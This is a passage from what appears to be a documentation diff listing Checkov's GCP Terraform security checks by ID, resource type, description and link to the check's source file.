[GoogleFolderImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderImpersonationRole.py) | +| 2281 | CKV_GCP_45 | resource | google_organization_iam_binding | Ensure no roles that enable to impersonate and manage all service accounts are used at an organization level | Terraform | [GoogleOrgImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgImpersonationRole.py) | +| 2282 | CKV_GCP_45 | resource | google_organization_iam_member | Ensure no roles that enable to impersonate and manage all service accounts are used at an organization level | Terraform | [GoogleOrgImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgImpersonationRole.py) | +| 2283 | CKV_GCP_46 | resource | google_project_iam_binding | Ensure Default Service account is not used at a project level | Terraform | [GoogleProjectMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectMemberDefaultServiceAccount.py) | +| 2284 | CKV_GCP_46 | resource | google_project_iam_member | Ensure Default Service account is not used at a project level | Terraform | [GoogleProjectMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectMemberDefaultServiceAccount.py) | +| 2285 | CKV_GCP_47 | resource | google_organization_iam_binding | Ensure default service account is not used at an organization level | Terraform | [GoogleOrgMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgMemberDefaultServiceAccount.py) | +| 2286 | CKV_GCP_47 | resource | google_organization_iam_member | Ensure default service account is not used at an organization level | Terraform | 
[GoogleOrgMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgMemberDefaultServiceAccount.py) | +| 2287 | CKV_GCP_48 | resource | google_folder_iam_binding | Ensure Default Service account is not used at a folder level | Terraform | [GoogleFolderMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderMemberDefaultServiceAccount.py) | +| 2288 | CKV_GCP_48 | resource | google_folder_iam_member | Ensure Default Service account is not used at a folder level | Terraform | [GoogleFolderMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderMemberDefaultServiceAccount.py) | +| 2289 | CKV_GCP_49 | resource | google_project_iam_binding | Ensure roles do not impersonate or manage Service Accounts used at project level | Terraform | [GoogleProjectImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectImpersonationRole.py) | +| 2290 | CKV_GCP_49 | resource | google_project_iam_member | Ensure roles do not impersonate or manage Service Accounts used at project level | Terraform | [GoogleProjectImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectImpersonationRole.py) | +| 2291 | CKV_GCP_50 | resource | google_sql_database_instance | Ensure MySQL database 'local_infile' flag is set to 'off' | Terraform | [GoogleCloudMySqlLocalInfileOff.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudMySqlLocalInfileOff.py) | +| 2292 | CKV_GCP_51 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_checkpoints' flag is set to 'on' | Terraform | 
[GoogleCloudPostgreSqlLogCheckpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogCheckpoints.py) | +| 2293 | CKV_GCP_52 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_connections' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogConnection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogConnection.py) | +| 2294 | CKV_GCP_53 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_disconnections' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogDisconnection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogDisconnection.py) | +| 2295 | CKV_GCP_54 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_lock_waits' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogLockWaits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogLockWaits.py) | +| 2296 | CKV_GCP_55 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_min_messages' flag is set to a valid value | Terraform | [GoogleCloudPostgreSqlLogMinMessage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinMessage.py) | +| 2297 | CKV_GCP_56 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_temp_files flag is set to '0' | Terraform | [GoogleCloudPostgreSqlLogTemp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogTemp.py) | +| 2298 | CKV_GCP_57 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_min_duration_statement' flag is set to '-1' | Terraform | 
[GoogleCloudPostgreSqlLogMinDuration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinDuration.py) | +| 2299 | CKV_GCP_58 | resource | google_sql_database_instance | Ensure SQL database 'cross db ownership chaining' flag is set to 'off' | Terraform | [GoogleCloudSqlServerCrossDBOwnershipChaining.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerCrossDBOwnershipChaining.py) | +| 2300 | CKV_GCP_59 | resource | google_sql_database_instance | Ensure SQL database 'contained database authentication' flag is set to 'off' | Terraform | [GoogleCloudSqlServerContainedDBAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerContainedDBAuthentication.py) | +| 2301 | CKV_GCP_60 | resource | google_sql_database_instance | Ensure Cloud SQL database does not have public IP | Terraform | [GoogleCloudSqlServerNoPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerNoPublicIP.py) | +| 2302 | CKV_GCP_61 | resource | google_container_cluster | Enable VPC Flow Logs and Intranode Visibility | Terraform | [GKEEnableVPCFlowLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnableVPCFlowLogs.py) | +| 2303 | CKV_GCP_62 | resource | google_storage_bucket | Bucket should log access | Terraform | [CloudStorageLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageLogging.py) | +| 2304 | CKV_GCP_63 | resource | google_storage_bucket | Bucket should not log to itself | Terraform | [CloudStorageSelfLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageSelfLogging.py) | +| 2305 | CKV_GCP_64 | resource | google_container_cluster | Ensure clusters are created with Private 
Nodes | Terraform | [GKEPrivateNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPrivateNodes.py) | +| 2306 | CKV_GCP_65 | resource | google_container_cluster | Manage Kubernetes RBAC users with Google Groups for GKE | Terraform | [GKEKubernetesRBACGoogleGroups.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEKubernetesRBACGoogleGroups.py) | +| 2307 | CKV_GCP_66 | resource | google_container_cluster | Ensure use of Binary Authorization | Terraform | [GKEBinaryAuthorization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEBinaryAuthorization.py) | +| 2308 | CKV_GCP_68 | resource | google_container_cluster | Ensure Secure Boot for Shielded GKE Nodes is Enabled | Terraform | [GKESecureBootforShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKESecureBootforShieldedNodes.py) | +| 2309 | CKV_GCP_68 | resource | google_container_node_pool | Ensure Secure Boot for Shielded GKE Nodes is Enabled | Terraform | [GKESecureBootforShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKESecureBootforShieldedNodes.py) | +| 2310 | CKV_GCP_69 | resource | google_container_cluster | Ensure the GKE Metadata Server is Enabled | Terraform | [GKEMetadataServerIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMetadataServerIsEnabled.py) | +| 2311 | CKV_GCP_69 | resource | google_container_node_pool | Ensure the GKE Metadata Server is Enabled | Terraform | [GKEMetadataServerIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMetadataServerIsEnabled.py) | +| 2312 | CKV_GCP_70 | resource | google_container_cluster | Ensure the GKE Release Channel is set | Terraform | 
[GKEReleaseChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEReleaseChannel.py) | +| 2313 | CKV_GCP_71 | resource | google_container_cluster | Ensure Shielded GKE Nodes are Enabled | Terraform | [GKEEnableShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnableShieldedNodes.py) | +| 2314 | CKV_GCP_72 | resource | google_container_cluster | Ensure Integrity Monitoring for Shielded GKE Nodes is Enabled | Terraform | [GKEEnsureIntegrityMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnsureIntegrityMonitoring.py) | +| 2315 | CKV_GCP_72 | resource | google_container_node_pool | Ensure Integrity Monitoring for Shielded GKE Nodes is Enabled | Terraform | [GKEEnsureIntegrityMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnsureIntegrityMonitoring.py) | +| 2316 | CKV_GCP_73 | resource | google_compute_security_policy | Ensure Cloud Armor prevents message lookup in Log4j2. 
See CVE-2021-44228 aka log4jshell | Terraform | [CloudArmorWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudArmorWAFACLCVE202144228.py) | +| 2317 | CKV_GCP_74 | resource | google_compute_subnetwork | Ensure that private_ip_google_access is enabled for Subnet | Terraform | [GoogleSubnetworkPrivateGoogleEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkPrivateGoogleEnabled.py) | +| 2318 | CKV_GCP_75 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted FTP access | Terraform | [GoogleComputeFirewallUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress21.py) | +| 2319 | CKV_GCP_76 | resource | google_compute_subnetwork | Ensure that Private google access is enabled for IPV6 | Terraform | [GoogleSubnetworkIPV6PrivateGoogleEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkIPV6PrivateGoogleEnabled.py) | +| 2320 | CKV_GCP_77 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow on ftp port | Terraform | [GoogleComputeFirewallUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress20.py) | +| 2321 | CKV_GCP_78 | resource | google_storage_bucket | Ensure Cloud storage has versioning enabled | Terraform | [CloudStorageVersioningEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageVersioningEnabled.py) | +| 2322 | CKV_GCP_79 | resource | google_sql_database_instance | Ensure SQL database is using latest Major version | Terraform | 
[CloudSqlMajorVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudSqlMajorVersion.py) | +| 2323 | CKV_GCP_80 | resource | google_bigquery_table | Ensure Big Query Tables are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [BigQueryTableEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryTableEncryptedWithCMK.py) | +| 2324 | CKV_GCP_81 | resource | google_bigquery_dataset | Ensure Big Query Datasets are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [BigQueryDatasetEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryDatasetEncryptedWithCMK.py) | +| 2325 | CKV_GCP_82 | resource | google_kms_crypto_key | Ensure KMS keys are protected from deletion | Terraform | [GoogleKMSPreventDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSPreventDestroy.py) | +| 2326 | CKV_GCP_83 | resource | google_pubsub_topic | Ensure PubSub Topics are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [CloudPubSubEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudPubSubEncryptedWithCMK.py) | +| 2327 | CKV_GCP_84 | resource | google_artifact_registry_repository | Ensure Artifact Registry Repositories are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [ArtifactRegsitryEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegsitryEncryptedWithCMK.py) | +| 2328 | CKV_GCP_85 | resource | google_bigtable_instance | Ensure Big Table Instances are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | 
[BigTableInstanceEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigTableInstanceEncryptedWithCMK.py) | +| 2329 | CKV_GCP_86 | resource | google_cloudbuild_worker_pool | Ensure Cloud build workers are private | Terraform | [CloudBuildWorkersArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudBuildWorkersArePrivate.py) | +| 2330 | CKV_GCP_87 | resource | google_data_fusion_instance | Ensure Data fusion instances are private | Terraform | [DataFusionPrivateInstance.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionPrivateInstance.py) | +| 2331 | CKV_GCP_88 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted mysql access | Terraform | [GoogleComputeFirewallUnrestrictedIngress3306.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3306.py) | +| 2332 | CKV_GCP_89 | resource | google_notebooks_instance | Ensure Vertex AI instances are private | Terraform | [VertexAIPrivateInstance.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIPrivateInstance.py) | +| 2333 | CKV_GCP_90 | resource | google_dataflow_job | Ensure data flow jobs are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [DataflowJobEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataflowJobEncryptedWithCMK.py) | +| 2334 | CKV_GCP_91 | resource | google_dataproc_cluster | Ensure Dataproc cluster is encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [DataprocClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocClusterEncryptedWithCMK.py) | +| 2335 | CKV_GCP_92 | resource | google_vertex_ai_dataset 
| Ensure Vertex AI datasets uses a CMK (Customer Managed Key) | Terraform | [VertexAIDatasetEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIDatasetEncryptedWithCMK.py) |
+| 2336 | CKV_GCP_93 | resource | google_spanner_database | Ensure Spanner Database is encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [SpannerDatabaseEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseEncryptedWithCMK.py) |
+| 2337 | CKV_GCP_94 | resource | google_dataflow_job | Ensure Dataflow jobs are private | Terraform | [DataflowPrivateJob.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataflowPrivateJob.py) |
+| 2338 | CKV_GCP_95 | resource | google_redis_instance | Ensure Memorystore for Redis has AUTH enabled | Terraform | [MemorystoreForRedisAuthEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/MemorystoreForRedisAuthEnabled.py) |
+| 2339 | CKV_GCP_96 | resource | google_vertex_ai_metadata_store | Ensure Vertex AI Metadata Store uses a CMK (Customer Managed Key) | Terraform | [VertexAIMetadataStoreEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIMetadataStoreEncryptedWithCMK.py) |
+| 2340 | CKV_GCP_97 | resource | google_redis_instance | Ensure Memorystore for Redis uses intransit encryption | Terraform | [MemorystoreForRedisInTransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/MemorystoreForRedisInTransitEncryption.py) |
+| 2341 | CKV_GCP_98 | resource | google_dataproc_cluster_iam_binding | Ensure that Dataproc clusters are not anonymously or publicly accessible | Terraform | 
[DataprocPrivateCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPrivateCluster.py) |
+| 2342 | CKV_GCP_98 | resource | google_dataproc_cluster_iam_member | Ensure that Dataproc clusters are not anonymously or publicly accessible | Terraform | [DataprocPrivateCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPrivateCluster.py) |
+| 2343 | CKV_GCP_99 | resource | google_pubsub_topic_iam_binding | Ensure that Pub/Sub Topics are not anonymously or publicly accessible | Terraform | [PubSubPrivateTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/PubSubPrivateTopic.py) |
+| 2344 | CKV_GCP_99 | resource | google_pubsub_topic_iam_member | Ensure that Pub/Sub Topics are not anonymously or publicly accessible | Terraform | [PubSubPrivateTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/PubSubPrivateTopic.py) |
+| 2345 | CKV_GCP_100 | resource | google_bigquery_table_iam_binding | Ensure that BigQuery Tables are not anonymously or publicly accessible | Terraform | [BigQueryPrivateTable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryPrivateTable.py) |
+| 2346 | CKV_GCP_100 | resource | google_bigquery_table_iam_member | Ensure that BigQuery Tables are not anonymously or publicly accessible | Terraform | [BigQueryPrivateTable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryPrivateTable.py) |
+| 2347 | CKV_GCP_101 | resource | google_artifact_registry_repository_iam_binding | Ensure that Artifact Registry repositories are not anonymously or publicly accessible | Terraform | [ArtifactRegistryPrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegistryPrivateRepo.py) |
+| 2348 | CKV_GCP_101 | resource | 
google_artifact_registry_repository_iam_member | Ensure that Artifact Registry repositories are not anonymously or publicly accessible | Terraform | [ArtifactRegistryPrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegistryPrivateRepo.py) |
+| 2349 | CKV_GCP_102 | resource | google_cloud_run_service_iam_binding | Ensure that GCP Cloud Run services are not anonymously or publicly accessible | Terraform | [GCPCloudRunPrivateService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GCPCloudRunPrivateService.py) |
+| 2350 | CKV_GCP_102 | resource | google_cloud_run_service_iam_member | Ensure that GCP Cloud Run services are not anonymously or publicly accessible | Terraform | [GCPCloudRunPrivateService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GCPCloudRunPrivateService.py) |
+| 2351 | CKV_GCP_103 | resource | google_dataproc_cluster | Ensure Dataproc Clusters do not have public IPs | Terraform | [DataprocPublicIpCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPublicIpCluster.py) |
+| 2352 | CKV_GCP_104 | resource | google_data_fusion_instance | Ensure Datafusion has stack driver logging enabled | Terraform | [DataFusionStackdriverLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionStackdriverLogs.py) |
+| 2353 | CKV_GCP_105 | resource | google_data_fusion_instance | Ensure Datafusion has stack driver monitoring enabled | Terraform | [DataFusionStackdriverMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionStackdriverMonitoring.py) |
+| 2354 | CKV_GCP_106 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted http port 80 access | Terraform | 
[GoogleComputeFirewallUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress80.py) |
+| 2355 | CKV_GCP_107 | resource | google_cloudfunctions2_function_iam_binding | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) |
+| 2356 | CKV_GCP_107 | resource | google_cloudfunctions2_function_iam_member | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) |
+| 2357 | CKV_GCP_107 | resource | google_cloudfunctions_function_iam_binding | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) |
+| 2358 | CKV_GCP_107 | resource | google_cloudfunctions_function_iam_member | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) |
+| 2359 | CKV_GCP_108 | resource | google_sql_database_instance | Ensure hostnames are logged for GCP PostgreSQL databases | Terraform | [GoogleCloudPostgreSqlLogHostname.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogHostname.py) |
+| 2360 | CKV_GCP_109 | resource | google_sql_database_instance | Ensure the GCP PostgreSQL database log levels are set to ERROR or lower | Terraform | [GoogleCloudPostgreSqlLogMinErrorStatement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinErrorStatement.py) | 
+| 2361 | CKV_GCP_110 | resource | google_sql_database_instance | Ensure pgAudit is enabled for your GCP PostgreSQL database | Terraform | [GoogleCloudPostgreSqlEnablePgaudit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlEnablePgaudit.py) |
+| 2362 | CKV_GCP_111 | resource | google_sql_database_instance | Ensure GCP PostgreSQL logs SQL statements | Terraform | [GoogleCloudPostgreSqlLogStatement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogStatement.py) |
+| 2363 | CKV_GCP_112 | resource | google_kms_crypto_key_iam_binding | Esnure KMS policy should not allow public access | Terraform | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py) |
+| 2364 | CKV_GCP_112 | resource | google_kms_crypto_key_iam_member | Esnure KMS policy should not allow public access | Terraform | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py) |
+| 2365 | CKV_GCP_112 | resource | google_kms_crypto_key_iam_policy | Esnure KMS policy should not allow public access | Terraform | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py) |
+| 2366 | CKV_GCP_113 | data | google_iam_policy | Ensure IAM policy should not define public access | Terraform | [GooglePolicyIsPrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/gcp/GooglePolicyIsPrivate.py) |
+| 2367 | CKV_GCP_114 | resource | google_storage_bucket | Ensure public access prevention is enforced on Cloud Storage bucket | Terraform | [GoogleStoragePublicAccessPrevention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStoragePublicAccessPrevention.py) |
+| 2368 | 
CKV_GCP_115 | resource | google_organization_iam_binding | Ensure basic roles are not used at organization level. | Terraform | [GoogleOrgBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgBasicRole.py) |
+| 2369 | CKV_GCP_115 | resource | google_organization_iam_member | Ensure basic roles are not used at organization level. | Terraform | [GoogleOrgBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgBasicRole.py) |
+| 2370 | CKV_GCP_116 | resource | google_folder_iam_binding | Ensure basic roles are not used at folder level. | Terraform | [GoogleFolderBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderBasicRole.py) |
+| 2371 | CKV_GCP_116 | resource | google_folder_iam_member | Ensure basic roles are not used at folder level. | Terraform | [GoogleFolderBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderBasicRole.py) |
+| 2372 | CKV_GCP_117 | resource | google_project_iam_binding | Ensure basic roles are not used at project level. | Terraform | [GoogleProjectBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectBasicRole.py) |
+| 2373 | CKV_GCP_117 | resource | google_project_iam_member | Ensure basic roles are not used at project level. 
| Terraform | [GoogleProjectBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectBasicRole.py) |
+| 2374 | CKV_GCP_118 | resource | google_iam_workload_identity_pool_provider | Ensure IAM workload identity pool provider is restricted | Terraform | [GoogleIAMWorkloadIdentityConditional.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleIAMWorkloadIdentityConditional.py) |
+| 2375 | CKV_GCP_119 | resource | google_spanner_database | Ensure Spanner Database has deletion protection enabled | Terraform | [SpannerDatabaseDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseDeletionProtection.py) |
+| 2376 | CKV_GCP_120 | resource | google_spanner_database | Ensure Spanner Database has drop protection enabled | Terraform | [SpannerDatabaseDropProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseDropProtection.py) |
+| 2377 | CKV_GCP_121 | resource | google_bigquery_table | Ensure BigQuery tables have deletion protection enabled | Terraform | [BigQueryTableDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryTableDeletionProtection.py) |
+| 2378 | CKV_GCP_122 | resource | google_bigtable_instance | Ensure Big Table Instances have deletion protection enabled | Terraform | [BigTableInstanceDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigTableInstanceDeletionProtection.py) |
+| 2379 | CKV_GCP_123 | resource | google_container_cluster | GKE Don't Use NodePools in the Cluster configuration | Terraform | [GKEDontUseNodePools.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEDontUseNodePools.py) |
+| 2380 | CKV_GCP_124 | resource | google_cloudfunctions2_function 
| Ensure GCP Cloud Function is not configured with overly permissive Ingress setting | Terraform | [CloudFunctionPermissiveIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionPermissiveIngress.py) |
+| 2381 | CKV_GCP_124 | resource | google_cloudfunctions_function | Ensure GCP Cloud Function is not configured with overly permissive Ingress setting | Terraform | [CloudFunctionPermissiveIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionPermissiveIngress.py) |
+| 2382 | CKV2_GCP_1 | resource | google_project_default_service_accounts | Ensure GKE clusters are not running using the Compute Engine default service account | Terraform | [GKEClustersAreNotUsingDefaultServiceAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GKEClustersAreNotUsingDefaultServiceAccount.yaml) |
+| 2383 | CKV2_GCP_2 | resource | google_compute_network | Ensure legacy networks do not exist for a project | Terraform | [GCPProjectHasNoLegacyNetworks.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPProjectHasNoLegacyNetworks.yaml) |
+| 2384 | CKV2_GCP_3 | resource | google_service_account_key | Ensure that there are only GCP-managed service account keys for each service account | Terraform | [ServiceAccountHasGCPmanagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/ServiceAccountHasGCPmanagedKey.yaml) |
